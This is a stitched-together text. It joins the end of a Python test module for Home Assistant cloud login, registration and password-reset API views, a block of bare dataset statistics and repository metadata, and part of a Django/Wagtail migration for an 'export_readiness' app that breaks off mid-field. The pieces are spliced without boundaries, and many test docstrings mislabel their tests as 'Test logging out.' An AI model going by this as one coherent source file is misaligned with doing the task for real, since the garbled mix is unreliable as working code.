"""Test fetching account if no account available."""
req = yield from cloud_client.get('/api/cloud/account')
assert req.status == 400
@asyncio.coroutine
def test_account_view(mock_auth, cloud_client):
"""Test fetching account if no account available."""
mock_auth.account = MagicMock(email='hello@home-assistant.io')
req = yield from cloud_client.get('/api/cloud/account')
assert req.status == 200
result = yield from req.json()
assert result == {'email': 'hello@home-assistant.io'}
@asyncio.coroutine
def test_login_view(mock_auth, cloud_client):
"""Test logging in."""
mock_auth.account = MagicMock(email='hello@home-assistant.io')
req = yield from cloud_client.post('/api/cloud/login', json={
'email': 'my_username',
'password': 'my_password'
})
assert req.status == 200
result = yield from req.json()
assert result == {'email': 'hello@home-assistant.io'}
assert len(mock_auth.login.mock_calls) == 1
result_user, result_pass = mock_auth.login.mock_calls[0][1]
assert result_user == 'my_username'
assert result_pass == 'my_password'
@asyncio.coroutine
def test_login_view_invalid_json(mock_auth, cloud_client):
"""Try logging in with invalid JSON."""
req = yield from cloud_client.post('/api/cloud/login', data='Not JSON')
assert req.status == 400
assert len(mock_auth.mock_calls) == 0
@asyncio.coroutine
def test_login_view_invalid_schema(mock_auth, cloud_client):
"""Try logging in with invalid schema."""
req = yield from cloud_client.post('/api/cloud/login', json={
'invalid': 'schema'
})
assert req.status == 400
assert len(mock_auth.mock_calls) == 0
@asyncio.coroutine
def test_login_view_request_timeout(mock_auth, cloud_client):
"""Test request timeout while trying to log in."""
mock_auth.login.side_effect = asyncio.TimeoutError
req = yield from cloud_client.post('/api/cloud/login', json={
'email': 'my_username',
'password': 'my_password'
})
assert req.status == 502
@asyncio.coroutine
def test_login_view_invalid_credentials(mock_auth, cloud_client):
"""Test logging in with invalid credentials."""
mock_auth.login.side_effect = auth_api.Unauthenticated
req = yield from cloud_client.post('/api/cloud/login', json={
'email': 'my_username',
'password': 'my_password'
})
assert req.status == 401
@asyncio.coroutine
def test_login_view_unknown_error(mock_auth, cloud_client):
"""Test unknown error while logging in."""
mock_auth.login.side_effect = auth_api.UnknownError
req = yield from cloud_client.post('/api/cloud/login', json={
'email': 'my_username',
'password': 'my_password'
})
assert req.status == 502
@asyncio.coroutine
def test_logout_view(mock_auth, cloud_client):
"""Test logging out."""
req = yield from cloud_client.post('/api/cloud/logout')
assert req.status == 200
data = yield from req.json()
assert data == {'message': 'ok'}
assert len(mock_auth.logout.mock_calls) == 1
@asyncio.coroutine
def test_logout_view_request_timeout(mock_auth, cloud_client):
"""Test timeout while logging out."""
mock_auth.logout.side_effect = asyncio.TimeoutError
req = yield from cloud_client.post('/api/cloud/logout')
assert req.status == 502
@asyncio.coroutine
def test_logout_view_unknown_error(mock_auth, cloud_client):
"""Test unknown error while logging out."""
mock_auth.logout.side_effect = auth_api.UnknownError
req = yield from cloud_client.post('/api/cloud/logout')
assert req.status == 502
@asyncio.coroutine
def test_register_view(mock_cognito, cloud_client):
"""Test logging out."""
req = yield from cloud_client.post('/api/cloud/register', json={
'email': 'hello@bla.com',
'password': 'falcon42'
})
assert req.status == 200
assert len(mock_cognito.register.mock_calls) == 1
result_email, result_pass = mock_cognito.register.mock_calls[0][1]
assert result_email == 'hello@bla.com'
assert result_pass == 'falcon42'
@asyncio.coroutine
def test_register_view_bad_data(mock_cognito, cloud_client):
"""Test logging out."""
req = yield from cloud_client.post('/api/cloud/register', json={
'email': 'hello@bla.com',
'not_password': 'falcon'
})
assert req.status == 400
assert len(mock_cognito.logout.mock_calls) == 0
@asyncio.coroutine
def test_register_view_request_timeout(mock_cognito, cloud_client):
"""Test timeout while logging out."""
mock_cognito.register.side_effect = asyncio.TimeoutError
req = yield from cloud_client.post('/api/cloud/register', json={
'email': 'hello@bla.com',
'password': 'falcon42'
})
assert req.status == 502
@asyncio.coroutine
def test_register_view_unknown_error(mock_cognito, cloud_client):
"""Test unknown error while logging out."""
mock_cognito.register.side_effect = auth_api.UnknownError
req = yield from cloud_client.post('/api/cloud/register', json={
'email': 'hello@bla.com',
'password': 'falcon42'
})
assert req.status == 502
@asyncio.coroutine
def test_confirm_register_view(mock_cognito, cloud_client):
"""Test logging out."""
req = yield from cloud_client.post('/api/cloud/confirm_register', json={
'email': 'hello@bla.com',
'confirmation_code': '123456'
})
assert req.status == 200
assert len(mock_cognito.confirm_sign_up.mock_calls) == 1
result_code, result_email = mock_cognito.confirm_sign_up.mock_calls[0][1]
assert result_email == 'hello@bla.com'
assert result_code == '123456'
@asyncio.coroutine
def test_confirm_register_view_bad_data(mock_cognito, cloud_client):
"""Test logging out."""
req = yield from cloud_client.post('/api/cloud/confirm_register', json={
'email': 'hello@bla.com',
'not_confirmation_code': '123456'
})
assert req.status == 400
assert len(mock_cognito.confirm_sign_up.mock_calls) == 0
@asyncio.coroutine
def test_confirm_register_view_request_timeout(mock_cognito, cloud_client):
"""Test timeout while logging out."""
mock_cognito.confirm_sign_up.side_effect = asyncio.TimeoutError
req = yield from cloud_client.post('/api/cloud/confirm_register', json={
'email': 'hello@bla.com',
'confirmation_code': '123456'
})
assert req.status == 502
@asyncio.coroutine
def test_confirm_register_view_unknown_error(mock_cognito, cloud_client):
"""Test unknown error while logging out."""
mock_cognito.confirm_sign_up.side_effect = auth_api.UnknownError
req = yield from cloud_client.post('/api/cloud/confirm_register', json={
'email': 'hello@bla.com',
'confirmation_code': '123456'
})
assert req.status == 502
@asyncio.coroutine
def test_forgot_password_view(mock_cognito, cloud_client):
"""Test logging out."""
req = yield from cloud_client.post('/api/cloud/forgot_password', json={
'email': 'hello@bla.com',
})
assert req.status == 200
assert len(mock_cognito.initiate_forgot_password.mock_calls) == 1
@asyncio.coroutine
def test_forgot_password_view_bad_data(mock_cognito, cloud_client):
"""Test logging out."""
req = yield from cloud_client.post('/api/cloud/forgot_password', json={
'not_email': 'hello@bla.com',
})
assert req.status == 400
assert len(mock_cognito.initiate_forgot_password.mock_calls) == 0
@asyncio.coroutine
def test_forgot_password_view_request_timeout(mock_cognito, cloud_client):
"""Test timeout while logging out."""
mock_cognito.initiate_forgot_password.side_effect = asyncio.TimeoutError
req = yield from cloud_client.post('/api/cloud/forgot_password', json={
'email': 'hello@bla.com',
})
assert req.status == 502
@asyncio.coroutine
def test_forgot_password_view_unknown_error(mock_cognito, cloud_client):
"""Test unknown error while logging out."""
mock_cognito.initiate_forgot_password.side_effect = auth_api.UnknownError
req = yield from cloud_client.post('/api/cloud/forgot_password', json={
'email': 'hello@bla.com',
})
assert req.status == 502
@asyncio.coroutine
def test_confirm_forgot_password_view(mock_cognito, cloud_client):
"""Test logging out."""
req = yield from cloud_client.post(
'/api/cloud/confirm_forgot_password', json={
'email': 'hello@bla.com',
'confirmation_code': '123456',
'new_password': 'hello2',
})
assert req.status == 200
assert len(mock_cognito.confirm_forgot_password.mock_calls) == 1
result_code, result_new_password = \
mock_cognito.confirm_forgot_password.mock_calls[0][1]
assert result_code == '123456'
assert result_new_password == 'hello2'
@asyncio.coroutine
def test_confirm_forgot_password_view_bad_data(mock_cognito, cloud_client):
"""Test logging out."""
req = yield from cloud_client.post(
'/api/cloud/confirm_forgot_password', json={
'email': 'hello@bla.com',
'not_confirmation_code': '123456',
'new_password': 'hello2',
})
assert req.status == 400
assert len(mock_cognito.confirm_forgot_password.mock_calls) == 0
@asyncio.coroutine
def test_confirm_forgot_password_view_request_timeout(mock_cognito,
cloud_client):
"""Test timeout while logging out."""
mock_cognito.confirm_forgot_password.side_effect = asyncio.TimeoutError
req = yield from cloud_client.post(
'/api/cloud/confirm_forgot_password', json={
'email': 'hello@bla.com',
'confirmation_code': '123456',
'new_password': 'hello2',
})
assert req.status == 502
@asyncio.coroutine
def test_confirm_forgot_password_view_unknown_error(mock_cognito,
cloud_client):
"""Test unknown error while logging out."""
mock_cognito.confirm_forgot_password.side_effect = auth_api.UnknownError
req = yield from cloud_client.post(
'/api/cloud/confirm_forgot_password', json={
'email': 'hello@bla.com',
'confirmation_code': '123456',
'new_password': 'hello2',
})
assert req.status == 502
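# Hedged sketch (not part of the original test module): the POST-then-assert
# pattern repeats across most of the views above, so a small coroutine helper
# like this one could express it in one place. It relies only on names that
# already exist in this file (`asyncio` and the `cloud_client` fixture).
@asyncio.coroutine
def _post_and_expect(cloud_client, url, payload, expected_status):
    """Issue a POST with a JSON payload and assert the response status."""
    req = yield from cloud_client.post(url, json=payload)
    assert req.status == expected_status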
| 33.219941
| 79
| 0.690237
| 1,454
| 11,328
| 5.127235
| 0.081843
| 0.084105
| 0.068813
| 0.0833
| 0.873508
| 0.854594
| 0.821328
| 0.778404
| 0.730651
| 0.640241
| 0
| 0.018903
| 0.187412
| 11,328
| 340
| 80
| 33.317647
| 0.790983
| 0.084393
| 0
| 0.646091
| 0
| 0
| 0.161707
| 0.051879
| 0
| 0
| 0
| 0
| 0.205761
| 1
| 0.123457
| false
| 0.176955
| 0.020576
| 0
| 0.152263
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
e7b95a3d63e912757e682ffbf7cf207894c51cad
| 35,573
|
py
|
Python
|
export_readiness/migrations/0031_internationallandingpage_squashed_0050_auto_20190219_1633.py
|
kaedroho/dit-directory-cms
|
67c15eeed19e7b3583f1fce1969230ddf83b6813
|
[
"MIT"
] | 6
|
2018-03-20T11:19:07.000Z
|
2021-10-05T07:53:11.000Z
|
export_readiness/migrations/0031_internationallandingpage_squashed_0050_auto_20190219_1633.py
|
kaedroho/dit-directory-cms
|
67c15eeed19e7b3583f1fce1969230ddf83b6813
|
[
"MIT"
] | 802
|
2018-02-05T14:16:13.000Z
|
2022-02-10T10:59:21.000Z
|
export_readiness/migrations/0031_internationallandingpage_squashed_0050_auto_20190219_1633.py
|
kaedroho/dit-directory-cms
|
67c15eeed19e7b3583f1fce1969230ddf83b6813
|
[
"MIT"
] | 6
|
2019-01-22T13:19:37.000Z
|
2019-07-01T10:35:26.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.18 on 2019-03-07 10:11
from __future__ import unicode_literals
import core.model_fields
import core.models
import core.validators
from django.db import migrations, models
import django.db.models.deletion
import modelcluster.fields
class Migration(migrations.Migration):
replaces = [('export_readiness', '0031_internationallandingpage'), ('export_readiness', '0032_auto_20181012_1507'), ('export_readiness', '0033_auto_20181023_1600'), ('export_readiness', '0034_auto_20181024_1112'), ('export_readiness', '0035_contactusguidance'), ('export_readiness', '0036_auto_20181105_1258'), ('export_readiness', '0037_auto_20181106_0952'), ('export_readiness', '0038_auto_20181106_0953'), ('export_readiness', '0039_contactsuccesspage_topic'), ('export_readiness', '0040_auto_20181121_1643'), ('export_readiness', '0041_campaignpage_marketingpages'), ('export_readiness', '0042_contactsuccesspages_contactusguidancepages'), ('export_readiness', '0043_auto_20181205_1413'), ('export_readiness', '0044_auto_20181214_1605'), ('export_readiness', '0045_auto_20190115_1058'), ('export_readiness', '0046_euexitformpages'), ('export_readiness', '0047_allcontactpagespage'), ('export_readiness', '0048_auto_20190206_1355'), ('export_readiness', '0049_auto_20190207_0924'), ('export_readiness', '0050_auto_20190219_1633')]
dependencies = [
('export_readiness', '0020_articlelistingpage_articlepage_topiclandingpage_squashed_0030_auto_20181005_1449'),
('wagtailimages', '0021_image_file_hash'),
('wagtailforms', '0003_capitalizeverbose'),
('wagtailcore', '0040_page_draft_title'),
]
operations = [
migrations.CreateModel(
name='InternationalLandingPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('service_name', models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True)),
],
options={
'abstract': False,
},
bases=(core.models.ExclusivePageMixin, 'wagtailcore.page'),
),
migrations.AlterField(
model_name='articlepage',
name='tags',
field=modelcluster.fields.ParentalManyToManyField(blank=True, to='export_readiness.Tag'),
),
migrations.AlterField(
model_name='euexitdomesticformpage',
name='body_text',
field=core.model_fields.MarkdownField(validators=[core.validators.slug_hyperlinks]),
),
migrations.AlterField(
model_name='euexitdomesticformpage',
name='heading',
field=models.CharField(max_length=255),
),
migrations.AlterField(
model_name='euexitdomesticformpage',
name='submit_button_text',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='euexitinternationalformpage',
name='body_text',
field=core.model_fields.MarkdownField(validators=[core.validators.slug_hyperlinks]),
),
migrations.AlterField(
model_name='euexitinternationalformpage',
name='heading',
field=models.CharField(max_length=255),
),
migrations.AlterField(
model_name='euexitinternationalformpage',
name='submit_button_text',
field=models.CharField(max_length=50),
),
migrations.AddField(
model_name='euexitdomesticformpage',
name='disclaimer',
field=models.TextField(default='', max_length=500),
preserve_default=False,
),
migrations.AddField(
model_name='euexitinternationalformpage',
name='disclaimer',
field=models.TextField(default='', max_length=500),
preserve_default=False,
),
migrations.AlterField(
model_name='articlelistingpage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='articlepage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='deprecatedgetfinancepage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='euexitdomesticformpage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='euexitformsuccesspage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='euexitinternationalformpage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='exportreadinessapp',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='homepage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='newgetfinancepage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='performancedashboardnotespage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='performancedashboardpage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='privacyandcookiespage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='termsandconditionspage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='topiclandingpage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True),
),
migrations.CreateModel(
name='ContactUsGuidancePage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('service_name', models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True)),
('topic', models.TextField(choices=[('alerts-not-relevant', 'Guidance - Daily alerts are not relevant'), ('opportunity-no-response', 'Guidance - Export Opportunity application no response'), ('no-verification-email', 'Guidance - Email verification missing'), ('password-reset', 'Guidance - Missing password reset link'), ('companies-house-login', 'Guidance - Companies House login not working'), ('verification-letter-code', 'Guidance - Where to enter letter verification code'), ('no-verification-letter', 'Guidance - Verification letter not delivered'), ('verification-missing', 'Guidance - Verification code not delivered'), ('company-not-found', 'Guidance - Company not found')], help_text='The slug and CMS page title are inferred from the topic', unique=True)),
('body', core.model_fields.MarkdownField(validators=[core.validators.slug_hyperlinks])),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='ContactSuccessPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('service_name', models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True)),
('heading', models.CharField(max_length=255, verbose_name='Title')),
('body_text', models.CharField(max_length=255, verbose_name='Body text')),
('next_title', models.CharField(max_length=255, verbose_name='Title')),
('next_body_text', models.CharField(max_length=255, verbose_name='Body text')),
('topic', models.TextField(choices=[('contact-success-form', 'Contact domestic form success'), ('contact-events-success-form', 'Contact Events form success'), ('contact-dso-success-form', 'Contact Defence and Security Organisation form success'), ('contact-export-advice-success-form', 'Contact exporting from the UK form success'), ('contact-feedback-success-form', 'Contact feedback form success'), ('contact-find-companies-success-form', 'Contact find UK companies form success'), ('contact-international-success-form', 'Contact international form success'), ('contact-soo-success-form', 'Contact Selling Online Overseas form success')], help_text='The slug and CMS page title are inferred from the topic', unique=True)),
],
options={
'abstract': False,
},
bases=(core.models.ExclusivePageMixin, 'wagtailcore.page'),
),
migrations.RemoveField(
model_name='deprecatedgetfinancepage',
name='banner_image',
),
migrations.RemoveField(
model_name='deprecatedgetfinancepage',
name='page_ptr',
),
migrations.RemoveField(
model_name='deprecatedgetfinancepage',
name='ukef_logo',
),
migrations.DeleteModel(
name='DeprecatedGetFinancePage',
),
migrations.RenameModel(
old_name='NewGetFinancePage',
new_name='GetFinancePage',
),
migrations.CreateModel(
name='CampaignPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('service_name', models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True)),
('campaign_heading', models.CharField(max_length=255)),
('section_one_heading', models.CharField(max_length=255)),
('section_one_intro', core.model_fields.MarkdownField(validators=[core.validators.slug_hyperlinks])),
('selling_point_one_heading', models.CharField(max_length=255)),
('selling_point_one_content', core.model_fields.MarkdownField(validators=[core.validators.slug_hyperlinks])),
('selling_point_two_heading', models.CharField(blank=True, max_length=255, null=True)),
('selling_point_two_content', core.model_fields.MarkdownField(blank=True, null=True, validators=[core.validators.slug_hyperlinks])),
('selling_point_three_heading', models.CharField(blank=True, max_length=255, null=True)),
('selling_point_three_content', core.model_fields.MarkdownField(blank=True, null=True, validators=[core.validators.slug_hyperlinks])),
('section_one_contact_button_url', models.CharField(blank=True, max_length=255, null=True)),
('section_one_contact_button_text', models.CharField(blank=True, max_length=255, null=True)),
('section_two_heading', models.CharField(max_length=255)),
('section_two_intro', core.model_fields.MarkdownField(validators=[core.validators.slug_hyperlinks])),
('section_two_contact_button_url', models.CharField(blank=True, max_length=255, null=True)),
('section_two_contact_button_text', models.CharField(blank=True, max_length=255, null=True)),
('related_content_heading', models.CharField(max_length=255)),
('related_content_intro', core.model_fields.MarkdownField(validators=[core.validators.slug_hyperlinks])),
('cta_box_message', models.CharField(max_length=255)),
('cta_box_button_url', models.CharField(max_length=255)),
('cta_box_button_text', models.CharField(max_length=255)),
('campaign_hero_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('section_one_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('section_two_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('selling_point_one_icon', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('selling_point_three_icon', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('selling_point_two_icon', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='MarketingPages',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('service_name', models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True)),
],
options={
'abstract': False,
},
bases=(core.models.ExclusivePageMixin, 'wagtailcore.page'),
),
migrations.CreateModel(
name='ContactSuccessPages',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('service_name', models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True)),
],
options={
'abstract': False,
},
bases=(core.models.ExclusivePageMixin, 'wagtailcore.page'),
),
migrations.CreateModel(
name='ContactUsGuidancePages',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('service_name', models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True)),
],
options={
'abstract': False,
},
bases=(core.models.ExclusivePageMixin, 'wagtailcore.page'),
),
migrations.CreateModel(
name='CountryGuidePage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('service_name', models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components')], db_index=True, max_length=100, null=True)),
('landing_page_title', models.CharField(max_length=255)),
('section_one_heading', models.CharField(max_length=50)),
('section_one_content', core.model_fields.MarkdownField(validators=[core.validators.slug_hyperlinks])),
('selling_point_one_heading', models.CharField(max_length=255)),
('selling_point_one_content', core.model_fields.MarkdownField(validators=[core.validators.slug_hyperlinks])),
('selling_point_two_heading', models.CharField(blank=True, max_length=255, null=True)),
('selling_point_two_content', core.model_fields.MarkdownField(blank=True, null=True, validators=[core.validators.slug_hyperlinks])),
('selling_point_three_heading', models.CharField(blank=True, max_length=255, null=True)),
('selling_point_three_content', core.model_fields.MarkdownField(blank=True, null=True, validators=[core.validators.slug_hyperlinks])),
('section_two_heading', models.CharField(max_length=255)),
('section_two_content', core.model_fields.MarkdownField(validators=[core.validators.slug_hyperlinks])),
('related_content_heading', models.CharField(max_length=255)),
('related_content_intro', core.model_fields.MarkdownField(validators=[core.validators.slug_hyperlinks])),
('hero_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='SuperregionPage',
fields=[
('topiclandingpage_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='export_readiness.TopicLandingPage')),
],
options={
'abstract': False,
},
bases=('export_readiness.topiclandingpage',),
),
migrations.RemoveField(
model_name='articlepage',
name='related_article_one_teaser',
),
migrations.RemoveField(
model_name='articlepage',
name='related_article_one_title',
),
migrations.RemoveField(
model_name='articlepage',
name='related_article_one_url',
),
migrations.RemoveField(
model_name='articlepage',
name='related_article_three_teaser',
),
migrations.RemoveField(
model_name='articlepage',
name='related_article_three_title',
),
migrations.RemoveField(
model_name='articlepage',
name='related_article_three_url',
),
migrations.RemoveField(
model_name='articlepage',
name='related_article_two_teaser',
),
migrations.RemoveField(
model_name='articlepage',
name='related_article_two_title',
),
migrations.RemoveField(
model_name='articlepage',
name='related_article_two_url',
),
migrations.AddField(
model_name='articlepage',
name='related_page_one',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='export_readiness.ArticlePage'),
),
migrations.AddField(
model_name='articlepage',
name='related_page_three',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='export_readiness.ArticlePage'),
),
migrations.AddField(
model_name='articlepage',
name='related_page_two',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='export_readiness.ArticlePage'),
),
migrations.AddField(
model_name='campaignpage',
name='related_page_one',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='export_readiness.ArticlePage'),
),
migrations.AddField(
model_name='campaignpage',
name='related_page_three',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='export_readiness.ArticlePage'),
),
migrations.AddField(
model_name='campaignpage',
name='related_page_two',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='export_readiness.ArticlePage'),
),
migrations.AddField(
model_name='countryguidepage',
name='related_page_one',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='export_readiness.ArticlePage'),
),
migrations.AddField(
model_name='countryguidepage',
name='related_page_three',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='export_readiness.ArticlePage'),
),
migrations.AddField(
model_name='countryguidepage',
name='related_page_two',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='export_readiness.ArticlePage'),
),
migrations.AddField(
model_name='countryguidepage',
name='selling_point_one_icon',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image'),
),
migrations.AddField(
model_name='countryguidepage',
name='selling_point_three_icon',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image'),
),
migrations.AddField(
model_name='countryguidepage',
name='selling_point_two_icon',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image'),
),
migrations.CreateModel(
name='SitePolicyPages',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('service_name', models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True)),
],
options={
'abstract': False,
},
bases=(core.models.ExclusivePageMixin, 'wagtailcore.page'),
),
migrations.AlterField(
model_name='performancedashboardnotespage',
name='body',
